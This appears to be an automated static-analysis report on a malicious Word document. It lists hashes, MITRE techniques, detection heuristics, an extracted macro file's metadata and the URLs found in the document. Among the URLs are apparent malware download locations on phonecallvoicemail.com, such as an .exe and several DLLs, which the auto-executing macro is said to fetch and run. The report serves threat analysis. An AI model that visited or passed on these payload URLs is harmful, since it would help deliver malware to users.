Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 c75a9108d565dda4…

MALICIOUS

Office (OLE) / .DOC

2.57 MB Created: 2022-04-23 07:21:00 Authoring application: Microsoft Office Word First seen: 2022-05-05
MD5: e641c2fb4b71b12e4f7abae53d89a5a8 SHA-1: 2d531426181c0ec14d2d1f8250ffc85eb4916fec SHA-256: c75a9108d565dda4d08d4673f221c53cce07b50680e62df43f30a1aa56a9957b
238 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic for Applications T1059.003 Windows Command Shell

This malicious document contains VBA macros that are automatically executed upon opening, indicated by the 'Document_Open' macro firing and the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic. The script utilizes 'CreateObject' to instantiate 'MSXML2.XMLHTTP' and 'Wscript.Shell', suggesting it attempts to download and execute additional payloads from the listed URLs. The presence of these objects and the auto-execution mechanism strongly indicate a downloader or droppper functionality.

Heuristics 9

  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Urgency / deadline lure low SE_URGENCY_LURE
    Document contains urgency or deadline language ('account will be terminated', 'action required within 24 hours', etc.) — useful context, but low-signal without other findings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://phonecallvoicemail.com/storm.png
    • https://phonecallvoicemail.com/time.ini
    • https://phonecallvoicemail.com/time.ini.bak
    • https://phonecallvoicemail.com/time.wav
    • https://phonecallvoicemail.com/vcruntime140.dll
    • https://phonecallvoicemail.com/crashreporter.exe
    • https://phonecallvoicemail.com/mozglue.dll
    • https://phonecallvoicemail.com/msvcp140.dll
    • https://phonecallvoicemail.com/nss3.dll
    • http://www.adsense-tools.com/
    • http://www.AdSense-tools.com
    • http://www.adsense-secrets.com/globat.html
    • http://www.nvu.com/
    • http://www.nvu.com
    • http://www.submitexpress.com/
    • http://www.free-web-money.com/000449.html
    • http://www.askthebuilder.com/457_Tar_and_Chip_Driveway_Update.shtml
    • http://www.askthebuilder.com/457_Tar_and_Chip_Driveway_Update.shtm
    • http://www.joelcomm.com/
    • http://www.joelcomm.com
    • http://www.dressesforthewedding.com/
    • http://www.lockergnome.com/
    • http://www.lockergnome.com
    • http://www.overture.com/
    • http://www.googlest.com/
    • http://keywords.clickhereforit.com/
    • http://www.worldvillage.com/336x280-1.html
    • http://www.worldvillage.com/336x280-1.htm
    • http://a.websponsors.com/c/s%3D15129/c%3D22828/j%3D0/l%3D%5Bslot_id%5D/i%3D1/
    • http://www.allfeeds.com/
    • https://www.google.com/support/adsense
    • https://www.google.com/adsense/glossary
    • http://www.google.com/services/adsense_tour/
    • https://google.com/adsense/localized-terms
    • http://service.bfast.com/bfast/click?bfmid=115761&siteid=9860223&categoryid=domain_reg_4
    • http://www.elance.com/
    • http://www.elance.com
    • http://www.guru.com/
    • http://www.guru.com
    • https://www.google.com/adsense/localized-terms
    • https://www.google.com/adsense/policies
    • https://www.google.com/AdSense/policies
    • https://www.google.com/adsense/adformats
    • https://www.Google.com/AdSense/adformats
    • https://www.google.com/support/adsense/bin/static.py?page=tips.html
    • https://www.google.com/support/AdSense/bin/static.py?page=tips.htm
    • http://www.intuitive.com/
    • http://www.intuitive.com
    • http://ns.adobe.com/xap/1.0/
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#
    +6 more URL(s)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
280e338f176721aea086dafcfed74b7607d1b84b0e6704b45c3f7a1219627a9e		 vba-macro oletools.olevba.extract_macros (decoded VBA source) 11145 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.

Open this report in the interactive analyzer, or submit your own file for analysis.